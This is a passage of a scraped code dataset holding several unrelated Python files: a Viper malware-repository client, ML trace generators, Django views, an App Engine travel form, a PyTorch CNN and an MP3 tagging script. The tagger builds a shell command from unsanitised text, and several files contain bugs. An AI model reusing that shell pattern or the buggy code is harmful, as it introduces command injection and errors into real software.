print(num)\n","sub_path":"PYTHON/BAEKJOON/2750_수_정렬하기(버블,선택,삽입)/2750_selection.py","file_name":"2750_selection.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"518944950","text":"#!/usr/bin/python\nfrom ConfigUtils import getBaseConfig\nfrom LogUtils import getModuleLogger\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\nfrom urlparse import urlparse\nfrom UserString import MutableString\nimport json\nimport os\nimport requests\nimport sys\nimport time\n\ncDir = os.path.dirname(os.path.realpath(__file__))\nrootDir = os.path.abspath(os.path.join(cDir, os.pardir))\nbaseConfig = getBaseConfig(rootDir)\nlogging = getModuleLogger(__name__)\n\ndef uploadToViper(filePath, fileName, tags):\n rawFile = open(filePath, 'rb')\n\n try:\n files = {'file': (fileName, rawFile)}\n tags = {'tags': tags}\n headers = {'User-agent': baseConfig.userAgent}\n \n logging.info(\"Adding to Viper: {0}\".format(fileName))\n\n response = requests.post(baseConfig.viperUrlAdd, headers=headers, files=files, data=tags)\n\n if response.status_code == 200:\n responsejson = json.loads(response.content)\n logging.info(\"Submitted to Viper, message: {0}\".format(responsejson[\"message\"]))\n return True\n\n else:\n logging.warning(\"Problem submitting {0} to Viper. Status code: {1}. Continuing.\".format(fileName, response.status_code))\n return False\n\n except Exception as e:\n logging.warning(\"Problem submitting {0} to Viper. Continuing.\".format(fileName))\n logging.exception(sys.exc_info())\n logging.exception(type(e))\n logging.exception(e.args)\n logging.exception(e)\n return False\n #sys.exit(1)\n\ndef getTags(fileHash, url, agent, urlHash=None):\n tags = MutableString()\n\n tags += fileHash\n tags += \",\"\n tags += urlparse(url).hostname\n tags += \",\"\n tags += url\n tags += \",\"\n\n if not urlHash == None:\n tags += urlHash\n tags += \",\"\n\n tags += time.strftime(baseConfig.dateFormat)\n tags += \",\"\n tags += agent\n\n logging.debug(\"tags={0}\".format(tags))\n\n return str(tags)\n\ndef isNewEntry(fileHash=None,urlHash=None):\n\n if not fileHash == None:\n params = { 'md5': fileHash.lower(), 'project': 'default' }\n\n if not urlHash == None:\n # Viper tags are all lowercase - for now.\n params = { 'tag': urlHash.lower(), 'project': 'default' }\n\n try:\n userAgent = {'User-agent': baseConfig.userAgent}\n\n response = requests.post(baseConfig.viperUrlFind, data=params, headers=userAgent)\n\n if not response.status_code == 200:\n if response.status_code == 400:\n logging.warning(\"400 Invalid Search Term: ({0})\".format(str(param)))\n return False\n else:\n logging.warning(\"Unable to perform HTTP request to Viper (HTTP code={0})\".format(response.status_code))\n return False\n except Exception as e:\n raise Exception(\"Unable to establish connection to Viper: {0}\".format(e))\n return False\n\n try:\n check = json.loads(response.content)\n\n if check['results']:\n check = check['results']\n else:\n logging.warning(\"Results key not present in JSON response.\")\n return False\n\n except ValueError as e:\n raise Exception(\"Unable to convert response to JSON: {0}\".format(e))\n return False\n\n for i in check:\n if str(i) == \"../\":\n return False\n if str(i) == \"default\":\n for v in check[i]:\n if not fileHash == None:\n if v['md5'] == fileHash:\n logging.info(\"File with hash: {0} is in Viper\".format(fileHash))\n return False\n if not urlHash == None:\n if urlHash in v['tags']:\n logging.info(\"URL with hash: {0} is in Viper\".format(urlHash))\n return False\n if not fileHash == None:\n logging.info(\"File with hash {0} is not in Viper\".format(fileHash))\n return True\n if not urlHash == None:\n logging.info(\"URL with hash {0} is not in Viper\".format(urlHash))\n return True\n return False\n\n","sub_path":"util/ViperUtils.py","file_name":"ViperUtils.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347486340","text":"import asl\nfrom mniststack import *\nimport torch\nimport common\nimport os\nfrom asl.loss import mean\n\n## Traces\n## ======\n\ndef tracegen1(nitems, nrounds):\n def trace1(items, r, runstate, push, pop, empty):\n \"\"\"Push push push, pop pop pop\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n for nr in range(nrounds):\n for i in range(nitems):\n (stack,) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n for j in range(nitems):\n (stack, pop_item) = pop(stack)\n asl.observe(pop_item, \"pop.{}.{}\".format(nr, j), runstate)\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n \n return pop_item\n \n return trace1\n\n\ndef tracegen2(nitems, nrounds):\n def trace2(items, r, runstate, push, pop, empty):\n \"\"\"Push Pop Push Push Pop Pop Push Push Push Pop Pop Pop\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n for nr in range(nrounds):\n for i in range(nitems):\n (stack,) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n pop_stack = stack\n for j in range(i, -1, -1):\n (pop_stack, pop_item) = pop(pop_stack)\n asl.log_append(\"{}/internal\".format(runstate['mode']), pop_stack)\n asl.observe(pop_item, \"pop.nr{}.i{}.j{}\".format(nr, i, j), runstate)\n return pop_item\n \n return trace2\n\n\ndef tracegen3(nitems, nrounds):\n def trace3(items, r, runstate, push, pop, empty):\n \"\"\"Pushes n items, to create n stacks, pops from random one\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n for nr in range(nrounds):\n stacks = []\n for i in range(nitems):\n (stack, ) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n stacks.append(stack)\n\n stack = r.choice(stacks)\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n (stack, pop_item) = pop(stack)\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n asl.observe(pop_item, \"pop.nr{}\".format(nr), runstate)\n \n return trace3\n\n\ndef tracegen4(nitems, nrounds):\n def trace4(items, r, runstate, push, pop, empty):\n \"\"\"Pushes n items, to create n stacks, pops from random one\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n for nr in range(nrounds):\n stacks = []\n for i in range(nitems):\n (stack, ) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n stacks.append(stack)\n\n (stack, pop_item) = pop(stack)\n asl.observe(pop_item, \"pop.nr{}.i{}\".format(nr, i), runstate)\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n return trace4\n\n\ndef tracegen5(nitems, nrounds):\n def trace5(items, r, runstate, push, pop, empty):\n \"\"\"Make n random choices over whether to push or pop\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n stack_size = 0\n choicesperround = nitems\n for nr in range(nrounds * choicesperround):\n if stack_size == 0:\n (stack, ) = push(stack, next(items))\n stack_size = stack_size + 1\n elif stack_size == nitems:\n (stack, pop_item) = pop(stack)\n asl.observe(pop_item, \"pop.nr{}\".format(nr), runstate)\n stack_size = stack_size - 1\n else:\n dopush = r.choice([True, False])\n if dopush:\n (stack, ) = push(stack, next(items))\n stack_size = stack_size + 1\n else:\n (stack, pop_item) = pop(stack)\n asl.observe(pop_item, \"pop.nr{}\".format(nr), runstate)\n stack_size = stack_size - 1\n\n # Final pop to make sure we get some data\n if stack_size > 0:\n (stack, pop_item) = pop(stack)\n asl.observe(pop_item, \"pop.final\", runstate) \n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n return trace5\n\n\ndef tracegen6(nitems, nrounds):\n def trace6(items, r, runstate, push, pop, empty):\n \"\"\"Pushes n items, to create n stacks, pops randnum times, then observe once\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n for nr in range(nrounds):\n stacks = []\n for i in range(nitems):\n (stack, ) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n stacks.append(stack)\n\n npops = r.randdint(1, nitems)\n for j in range(npops):\n (stack, pop_item) = pop(stack)\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n \n asl.observe(pop_item, \"pop.nr{}\".format(nr), runstate)\n \n return trace6\n\n## Hyper Params\n## ============\n\nimport numpy as np\nimport random\nimport torch.nn.functional as F\nfrom torch import optim\n\ndef optim_sampler():\n lr = random.choice([0.001, 0.0001, 0.00001])\n optimizer = random.choice([optim.Adam])\n return {\"optimizer\": optimizer,\n \"lr\": lr}\n\ndef conv_hypers(pbatch_norm=0.5, max_layers=6):\n \"Sample hyper parameters\"\n learn_batch_norm = np.random.rand() > 0.5\n nlayers = np.random.randint(2, max_layers)\n h_channels = random.choice([4, 8])\n act = random.choice([F.elu])\n last_act = random.choice([F.elu])\n ks = random.choice([3])\n arch_opt = {'batch_norm': True,\n 'h_channels': 2,\n 'activation': F.relu,\n 'ks': ks,\n 'nblocks': 1, \n 'last_activation': last_act,\n 'learn_batch_norm': False,\n 'padding': (ks - 1)//2}\n return {\"arch\": asl.archs.conv_res_net.ConvResNet,\n \"arch_opt\": arch_opt}\n\ndef stack_optspace(): \n return {\"tracegen\": [tracegen1, tracegen2, tracegen3, tracegen4, tracegen5],\n \"nrounds\": [2, 1],\n \"dataset\": \"mnist\",\n \"nchannels\": 1,\n \"nitems\": [3, 5],\n \"normalize\": True,\n \"batch_size\": [16, 32],\n \"learn_constants\": True,\n \"accum\": mean,\n \"init\": [torch.nn.init.uniform,\n torch.nn.init.normal],\n \"arch_opt\": conv_hypers,\n \"optim_args\": optim_sampler}\n\ndef traces_gen(nsamples):\n # Delaying computation of this value because we dont know nsamples yet\n return asl.prodsample(stack_optspace(),\n to_enum=[\"tracegen\", \"nrounds\", \"nitems\"],\n to_sample=[\"init\",\n \"batch_size\"],\n to_sample_merge=[\"arch_opt\", \"optim_args\"],\n nsamples=nsamples)\n\nif __name__ == \"__main__\":\n thisfile = os.path.abspath(__file__)\n res = common.trainloadsave(thisfile, train_stack, traces_gen, stack_args)","sub_path":"aslbench/test_res_net.py","file_name":"test_res_net.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"270610604","text":"from rest_framework.routers import DefaultRouter\n\nfrom . views import admin, manage\n\n\nrouter = DefaultRouter()\nrouter.register(r'trader', manage.TraderViewSet, base_name='trader')\n\n\nurlpatterns = [\n url(r'^admin/login/$', admin.login_view())\n]","sub_path":"trader/core/manage_urls.py","file_name":"manage_urls.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"7382417","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom django.urls import reverse\n# views here\nfrom .models import Cart, CartItem\nfrom products.models import Product, Variations\nfrom django.contrib.auth.decorators import login_required\n\ndef cart_view(request):\n try:\n the_id = request.session['cart_id']\n except:\n the_id = None\n if the_id:\n cart = Cart.objects.get(id = the_id)\n context = {'cart':cart}\n new_total = 0.00\n for item in cart.cartitem_set.all():\n line_total = float(item.product.price) * item.quantity\n new_total += line_total\n request.session['cart_items_count'] = cart.cartitem_set.count()\n cart.total = new_total\n cart.save()\n else:\n empty_message = \"Your cart is empty, please keep shoping \"\n context = {'empty':True,'empty_message':empty_message}\n template = 'cart/cart_view.html'\n return render(request,template, context)\n\ndef remove_from_cart(request, id):\n try:\n the_id = request.session['cart_id']\n except Exception as e:\n return HttpResponseRedirect(reverse('cart'))\n\n cart_item = CartItem.objects.get(id=id)\n # cart_item.delete()\n cart_item.cart = None\n cart_item.save()\n return HttpResponseRedirect(reverse('cart'))\n\n@login_required\ndef add_to_cart(request, slug):\n try:\n the_id = request.session['cart_id']\n except:\n new_cart = Cart()\n new_cart.save()\n request.session['cart_id'] = new_cart.id\n the_id = new_cart.id\n cart = Cart.objects.get(id = the_id)\n try:\n product = Product.objects.get(slug = slug)\n except Product.DoesNotExists:\n pass\n except:\n pass\n product_vars = []\n if request.method == 'POST':\n qty = request.POST['qty']\n if int(qty) >= 0:\n for item in request.POST:\n \n key = item\n val = request.POST[key]\n print(key,val)\n try:\n v = Variations.objects.get(product = product, category__iexact= key, title__iexact =val)\n product_vars.append(v)\n except:\n pass\n cart_item = CartItem.objects.create(cart = cart,product=product) \n if len(product_vars) >0 : \n cart_item.variations.add(*product_vars)\n cart_item.quantity = qty\n cart_item.save()\n return HttpResponseRedirect(reverse('cart'))\n return HttpResponseRedirect(reverse('cart'))\n","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"196423389","text":"from django.shortcuts import render\nfrom .models import SearchQuery\nfrom blogs.models import Post\nfrom support.models import Question\nfrom itertools import chain\n# Create your views here.\n\nfrom django.views.generic import ListView\n\n\nclass SearchView(ListView):\n template_name = 'searches/view.html'\n # paginate_by = 1\n count = 0\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['count'] = self.count or 0\n context['query'] = self.request.GET.get('q')\n return context\n\n def get_queryset(self):\n request = self.request\n query = request.GET.get('q', None)\n print(query)\n if query is not None:\n # blog_results = Post.objects.search(query)\n question_results = Question.objects.search(query)\n # lesson_results = Lesson.objects.search(query)\n # profile_results = Profile.objects.search(query)\n\n # combine querysets\n queryset_chain = chain(\n # blog_results,\n question_results\n )\n qs = sorted(queryset_chain,\n key=lambda instance: instance.pk,\n reverse=True)\n self.count = len(qs) # since qs is actually a list\n # print(qs)\n return qs\n # empty_qs = Post.objects.none() or Question.objects.none()\n empty_qs = Question.objects.none()\n return empty_qs # just an empty queryset as default\n\n\ndef search_query(request):\n query = request.GET.get('q', None)\n # print(query)\n user = None\n if request.user.is_authenticated:\n user = request.user\n context = {\n 'query': query\n }\n if query is not None:\n SearchQuery.objects.create(user=user, query=query)\n blog_list = Post.objects.search(query=query)\n blog_list = blog_list.distinct()\n # print(blog_list)\n context['blog_list'] = blog_list\n # print(context)\n return render(request, 'searches/view.html', context)\n","sub_path":"searches/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"57424420","text":"import datetime\nimport os\nimport jinja2\nimport webapp2\n\n\nfrom google.appengine.ext import db\n\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir), autoescape=True)\n\nvalid_months = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\",\n \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\nvalid_years = [2011, 2012]\nfuzzy_times = [\"anytime\", \"morning\", \"noon\", \"evening\", \"late night\"]\ndefaults = {\n \"title\" : \"Travel Form\",\n \"months\": valid_months,\n \"years\" : valid_years,\n \"times\" : fuzzy_times,\n}\n\nclass TravelForm(db.Model):\n created = db.DateTimeProperty(auto_now_add=True)\n from_city = db.StringProperty(required=True)\n to_city = db.StringProperty(required=True)\n start_date = db.DateProperty(required=True)\n return_date = db.DateProperty(required=True)\n fuzzy_start_time = db.StringProperty(required=True, choices=fuzzy_times)\n fuzzy_end_time = db.StringProperty(required=True, choices=fuzzy_times)\n num_passengers = db.IntegerProperty(default=1,\n required=True,\n validator= lambda x: 1 <= x <= 12)\n\n\nclass Handler(webapp2.RequestHandler):\n def write(self, *args, **kwargs):\n self.response.out.write(*args, **kwargs)\n\n def render_str(self, template, **params):\n t = jinja_env.get_template(template)\n return t.render(params)\n\n def render(self, template, **kwargs):\n self.write(self.render_str(template, **kwargs))\n\n\nclass MainHandler(Handler):\n def get(self):\n self.render(\"index.html\", **defaults)\n\n def post(self):\n from_city = self.request.get(\"from_city\")\n to_city = self.request.get(\"to_city\")\n\n from_date = self.request.get(\"from_date\")\n from_month = self.request.get(\"from_month\")\n from_year = self.request.get(\"from_year\")\n\n to_date = self.request.get(\"to_date\")\n to_month = self.request.get(\"to_month\")\n to_year = self.request.get(\"to_year\")\n\n from_time = self.request.get(\"from_time\")\n to_time = self.request.get(\"to_time\")\n num_passengers = self.request.get(\"num_passengers\")\n\n obtained_values = {\n 'from_city' : from_city,\n 'to_city' : to_city,\n 'from_date' : from_date,\n 'from_month' : from_month,\n 'from_year': from_year,\n 'to_date' : to_date,\n 'to_month': to_month,\n 'to_year' : to_year,\n 'from_time' : from_time,\n 'to_time' : to_time,\n 'num_passengers' : num_passengers\n }\n\n if not from_city or not to_city:\n if not from_city:\n error = \"Please provide your boarding (From) city\"\n else:\n error = \"Please provide your destination (To) city\"\n error_form_details = {\n \"city_error\" : error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n\n\n try:\n from_datetime_date = datetime.date(day=int(from_date), month=int(from_month), year=int(from_year))\n except ValueError:\n error = \"Please verify the Departure Date. It looks invalid.\"\n\n error_form_details = {\n \"from_date_error\": error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n try:\n to_datetime_date = datetime.date(day=int(to_date), month=int(to_month), year=int(to_year))\n except ValueError:\n error = \"Please verify the Return Date. It looks invalid.\"\n error_form_details = {\n \"to_date_error\": error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n\n if to_datetime_date < from_datetime_date:\n error = \"Return Date should be greater than Departure Date. (Unless you are a time traveller!)\"\n error_form_details = {\n \"date_error\": error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n elif to_datetime_date == from_datetime_date:\n values_compare = {}\n for index, value in enumerate(fuzzy_times):\n values_compare[value] = index\n\n if values_compare[from_time] and values_compare[to_time]:\n if values_compare[from_time] >= values_compare[to_time]:\n error = \"Return time should be greater then traveling time when travelling on the same day.\"\n error_form_details = {\n 'time_error' : error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n\n travel_details = {\n 'from_city': from_city,\n 'to_city' : to_city,\n 'start_date' : from_datetime_date,\n 'return_date' : to_datetime_date,\n 'fuzzy_start_time': from_time,\n 'fuzzy_end_time' : to_time,\n 'num_passengers': int(num_passengers)\n }\n travel = TravelForm(**travel_details)\n\n travel.put()\n travel_details['start_date'] = from_datetime_date.strftime(\"%b %d %Y\")\n travel_details['return_date'] = to_datetime_date.strftime(\"%b %d %Y\")\n self.render(\"submitted.html\", **travel_details)\n\n\napp = webapp2.WSGIApplication([('/', MainHandler)],\n debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"51771087","text":"#!/usr/bin/env python3\n# fool 2020-05-01\n'''\n CNN on Pytorch\n'''\nimport torch\nfrom torch import nn\nimport torchvision\nimport torchvision.transforms as transforms\n\n# Device Configuration\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# Hyper parameters\nnum_epochs = 2\nnum_classes = 10\nbatch_size = 100\nlearning_rate = 0.001\n\n\n# Mnist dataset\ntrainset = torchvision.datasets.MNIST(root='./data',\n train=True, download=True,\n transform=transforms.ToTensor()\n )\ntestset = torchvision.datasets.MNIST(root='./data',\n train=False, download=True,\n transform=transforms.ToTensor()\n )\n\n# DataLoader\ntrainloader = torch.utils.data.DataLoader(dataset=trainset,\n batch_size=batch_size,\n shuffle=True)\ntestloader = torch.utils.data.DataLoader(dataset=testset,\n batch_size=batch_size,\n shuffle=False)\n\n# Convolutional neural network (two convolutional layers)\nclass ConvNet(nn.Module):\n def __init__(self, num_classes=10):\n super(ConvNet, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 16, kernel_size=5, stride=1, padding=2),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(2,2)\n )\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 32, kernel_size=5, stride=1, padding=2),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(2,2)\n )\n self.fc = nn.Linear(32*7*7, num_classes)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.reshape(out.size(0), -1)\n out = self.fc(out)\n return out\n\n\nmodel = ConvNet(num_classes).to(device)\n\n# loss and optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(params=model.parameters(), lr=learning_rate)\n\n# Train the model\nmodel.train()\ntotal_step = len(trainloader)\nfor epoch in range(num_epochs):\n for i, (images, labels) in enumerate(trainloader):\n images = images.to(device)\n labels = labels.to(device)\n\n # Forward pass\n outputs = model(images)\n loss = criterion(outputs, labels)\n\n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if (i+1) % 100 == 0:\n print(\"Epoch: [{}/{}], Step: [{}/{}], Loss: {:.4f}\"\n .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\n\n# Test the model\nmodel.eval()\nwith torch.no_grad():\n correct = 0\n total = 0\n for images, labels in testloader:\n images = images.to(device)\n lables = labels.to(device)\n\n outputs = model(images)\n _, predicted = torch.max(outputs, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n print('Test accuracy of the model on the 10000 images: {}%'.format(100*correct/total))\n# Save the model checkpoint\ntorch.save(model.state_dict(), 'torch_cnn.ckpt')","sub_path":"machine_learning_2020/pytorch/torch_cnn.py","file_name":"torch_cnn.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"416277646","text":"from pprint import pprint\r\nfrom time import time\r\nimport base64\r\nfrom glob import glob\r\nimport io\r\nimport os\r\nfrom os import system\r\nimport subprocess\r\nfrom urllib import parse\r\nfrom urllib.request import urlopen\r\nimport json\r\n\r\ntry: \r\n import shlex\r\n import platform\r\n import pathlib\r\n from mutagen import File\r\n from mutagen.easyid3 import EasyID3\r\n import mutagen.id3\r\n from mutagen.id3 import Encoding\r\n from mutagen.mp3 import MP3\r\n from PIL import Image\r\n import requests\r\nexcept ImportError as e:\r\n print(e)\r\n print('Press Enter to quit...')\r\n quit()\r\n\r\n# TODO: Add ffmpeg binary to the repo\r\np = subprocess.Popen('ffmpeg', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\nout, err = p.communicate()\r\nar = b\"'ffmpeg' is not recognized as an internal or external command,\\r\\noperable program or batch file.\\r\\n\"\r\nif ar == err:\r\n print('FFMPEG NOT ON PATH')\r\n input('Press enter to go to FFMPEG website and learn how to add to path...')\r\n import webbrowser\r\n webbrowser.open('https://ffmpeg.org/download.html')\r\n webbrowser.open('http://blog.gregzaal.com/how-to-install-ffmpeg-on-windows/')\r\n quit()\r\n\r\n# this dictionary store the api keys\r\nconfig = {}\r\nspotify_access_token_creation = 0\r\nspotify_access_token = ''\r\n\r\n\r\ndef copy(text):\r\n if platform.system() == 'Windows':\r\n command = f'echo|set/p={text}|clip'\r\n system(command)\r\n return True\r\n return False\r\n\r\n\r\ndef get_spotify_access_token():\r\n global spotify_access_token, spotify_access_token_creation\r\n if time() - spotify_access_token_creation > 21600:\r\n spotify_access_token_creation = time()\r\n header = {'Authorization': 'Basic ' + SPOTIFY_B64_AUTH_STR}\r\n data = {'grant_type': 'client_credentials'}\r\n access_token_response = requests.post('https://accounts.spotify.com/api/token', headers=header, data=data)\r\n spotify_access_token = access_token_response.json()['access_token']\r\n return spotify_access_token\r\n\r\n\r\ntry:\r\n with open('config.json') as config_file:\r\n config: dict = json.load(config_file)\r\n SPOTIFY_AUTH_STR = f\"{config['SPOTIFY_CLIENT_ID']}:{config['SPOTIFY_SECRET']}\"\r\n SPOTIFY_B64_AUTH_STR = base64.urlsafe_b64encode(SPOTIFY_AUTH_STR.encode()).decode()\r\n print('Spotify API keys loaded')\r\n LASTFM_API = config['LASTFM_API']\r\n LASTFM_SECRET = config['LASTFM_SECRET']\r\n print('LASTFM API keys loaded')\r\n # TODO: support multiple directories\r\n # this is for future when I get a Soundcloud api key\r\n # SOUNDCLOUD_CLIENT_ID = config['SOUNDCLOUD_CLIENT_ID']\r\n # SOUNDCLOUD_CLIENT_SECRET = config['SOUNDCLOUD_CLIENT_SECRET']\r\nexcept (FileNotFoundError, KeyError):\r\n print('Limited functionality')\r\n\r\n\r\ndef set_title(audio: EasyID3, title: str):\r\n \"\"\"\r\n Sets a title for an EasyID3 object\r\n :param audio: EasyID3 Object\r\n :param title: string\r\n \"\"\"\r\n audio['title'] = title\r\n audio.save()\r\n\r\n\r\ndef set_artists(audio: EasyID3, artists):\r\n \"\"\"\r\n Sets an artist for an EasyID3 object\r\n :param audio: EasyID3\r\n :param artist: string or list[str] of the artist or artists\r\n \"\"\"\r\n audio['artist'] = artists\r\n audio.save()\r\n\r\n\r\ndef set_album(audio: EasyID3, album):\r\n \"\"\"\r\n Sets an album for an EasyID3 object\r\n :param audio: EasyID3\r\n :param album: string name of the album\r\n \"\"\"\r\n audio['album'] = album\r\n audio.save()\r\n\r\n\r\ndef set_album_artist(audio: EasyID3, album_artist):\r\n \"\"\"\r\n Sets an album coverist for an EasyID3 object\r\n :param audio: EasyID3\r\n :param album_artist: name of the album coverist\r\n \"\"\"\r\n audio['albumartist'] = album_artist\r\n audio.save()\r\n\r\n\r\ndef get_artist(filename):\r\n \"\"\"\r\n Extraction of artist name(s) from filename\r\n Different ways to name a file\r\n Lots of these are just-in-case situations\r\n The standard for naming multiple artists is comma separated values with a space after each comma\r\n Eg. filename = \"artist_1, artist_2, artist_3 - title.mp3\"\r\n \"\"\"\r\n\r\n artist = filename[:filename.index(' -')]\r\n\r\n if artist.count(' , '): artist.split(' , ')\r\n elif artist.count(', '): artist = artist.split(', ')\r\n elif artist.count(','): artist = artist.split(',')\r\n\r\n if artist.count(' vs. '): artist = artist.split(' vs. ')\r\n elif artist.count(' vs '): artist = artist.split(' vs ')\r\n elif artist.count(' vs.'): artist = artist.split(' vs.')\r\n elif artist.count(' vs'): artist = artist.split(' vs')\r\n\r\n # Cannot split on & because \"Dimitri Vegas & Like Mike\" is considered as one artist\r\n\r\n if artist.count(' and '): artist = artist.split(' and ')\r\n elif artist.count(' and'): artist = artist.split(' and')\r\n\r\n if artist.count(' ft '): artist = artist.split(' ft ')\r\n elif artist.count(' ft. '): artist = artist.split(' ft. ')\r\n elif artist.count(' ft.'): artist = artist.split(' ft.')\r\n elif artist.count(' ft'): artist.split(' ft')\r\n\r\n if artist.count(' feat '): artist = artist.split(' feat ')\r\n elif artist.count(' feat. '): artist = artist.split(' feat. ')\r\n elif artist.count(' feat.'): artist = artist.split(' feat.')\r\n elif artist.count(' feat'): artist = artist.split(' feat')\r\n\r\n return artist\r\n\r\n\r\ndef add_simple_meta(file_path, artist='', title='', album='', albumartist='', override=False):\r\n \"\"\"\r\n Automatically sets the metadata for a music file\r\n :param file_path: the path to the music file\r\n :param artist: given artist name\r\n :param title: given title name\r\n :param album: given album name\r\n :param albumartist: given album coverist\r\n :param override: if True, all of the metadata is overridden\r\n :return: True or False depending on whether audio file was changed or not\r\n \"\"\"\r\n audio = EasyID3(file_path)\r\n filename = pathlib.Path(file_path).name # or filename = file_path[:-4]\r\n try:\r\n if (not override and audio.get('title') and audio.get('artist')\r\n and audio.get('albumartist') and has_album_cover(file_path)): return False\r\n if artist == '': artist = get_artist(filename)\r\n else:\r\n if artist.count(' , '): artist.split(' , ')\r\n elif artist.count(', '): artist = artist.split(', ')\r\n elif artist.count(','): artist = artist.split(',')\r\n if title == '': title = filename[filename.index('-') + 2:-4]\r\n if override:\r\n audio['title'] = title\r\n audio['artist'] = artist\r\n if album != '': audio['album'] = album\r\n if albumartist != '': audio['albumartist'] = albumartist\r\n else:\r\n if 'album' not in audio:\r\n if album == '': audio['album'] = title\r\n else: audio['album'] = album\r\n if 'title' not in audio: audio['title'] = title\r\n if 'artist' not in audio: audio['artist'] = artist\r\n if 'albumartist' not in audio:\r\n if albumartist == '': audio['albumartist'] = artist\r\n else: audio['albumartist'] = albumartist\r\n audio.save()\r\n if not has_album_cover(file_path): set_album_cover(file_path)\r\n return True\r\n except ValueError:\r\n print('Error with', filename)\r\n return False\r\n\r\n\r\nset_simple_meta = add_simple_meta\r\n\r\n\r\ndef has_album_cover(audio) -> bool:\r\n \"\"\"\r\n Checks if the file has an album cover\r\n Also fixes album cover key + Encoding\r\n :param audio: Either file path or audio object\r\n :return: boolean expressing whether the file contains album cover\r\n \"\"\"\r\n if type(audio) == str: audio: File = File(audio)\r\n try:\r\n fix_cover(audio)\r\n if 'APIC:' in audio:\r\n apic: mutagen.id3.APIC = audio['APIC:']\r\n if apic.encoding != Encoding.LATIN1:\r\n apic.encoding = Encoding.LATIN1\r\n audio['APIC:'] = apic\r\n audio.save()\r\n return True\r\n except KeyError: audio.add_tags()\r\n return False\r\n\r\n\r\ndef retrieve_album_art(audio: MP3):\r\n apics = [k for k in audio if k.startswith('APIC')]\r\n if apics: return apics[0]\r\n return None\r\n\r\n\r\nget_album_art = retrieve_album_art\r\n\r\n\r\ndef search_album_art(artist, title, select_index=0, return_all=False):\r\n # TODO: rename to search_album_art\r\n \"\"\"\r\n Fetches max resolution album cover(s) for track (artist and title specified) using Spotify API\r\n :param artist: artist\r\n :param title: title of track\r\n :param select_index: which result to pick (by default the first)\r\n :param return_all: if set to True, function returns all max res album cover\r\n :return: url(s) of the highest resolution album cover for the track\r\n \"\"\"\r\n # TODO: add soundcloud search as well if spotify comes up with no results.\r\n # Soundcloud has it disabled\r\n artist, title = parse.quote_plus(artist), parse.quote_plus(title)\r\n header = {'Authorization': 'Bearer ' + get_spotify_access_token()}\r\n r = requests.get(f'https://api.spotify.com/v1/search?q={title}+artist:{artist}&type=track', headers=header)\r\n if return_all: return [item['album']['images'][0]['url'] for item in 